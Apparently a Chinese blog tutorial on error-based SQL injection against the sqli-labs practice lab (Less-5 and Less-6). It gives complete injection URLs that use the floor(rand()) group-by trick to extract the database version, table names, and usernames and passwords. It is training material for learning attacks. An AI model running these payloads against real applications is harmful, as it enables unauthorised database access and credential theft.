​小课堂 -- 报错注入(Get)

环境sqli-labs

 

less 5

1、我们随便输入',看到报错信息

​小课堂 -- 报错注入(Get)

可以判断,需要单引号闭合

 

2、构造查询获取数据库名称语句

http://192.168.1.120/sqli/Less-5/?id=1' union select 1,2,3 from (select count(*),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a)limit 0,1),floor (rand(0)*2))x from information_schema.tables group by x)a --+

​小课堂 -- 报错注入(Get)

 

3、获取表名语句

http://192.168.1.120/sqli/Less-5/?id=1' union select 1,2,3 from (select count(*),concat((select concat(table_name,0x3a,0x3a)from information_schema.tables where table_schema=database() limit 0,1),floor (rand(0)*2))x from information_schema.tables group by x)a --+

​小课堂 -- 报错注入(Get)

 

4、获取用户信息

http://192.168.1.120/sqli/Less-5/?id=1' union select 1,2,3 from (select count(*),concat((select concat(username,0x3a,0x3a,password,0x3a,0x3a)from security.users limit 2,1),floor (rand(0)*2))x from information_schema.tables group by x)a --+

​小课堂 -- 报错注入(Get)

 

less 6

双引号闭合,和上面方法相同

 

禁止非法,后果自负

 

 

 

上一篇:mysql查询没有主键的表


下一篇:自然语言处理学习——论文分享——A Mutual Information Maximization Perspective of Language Representation Learning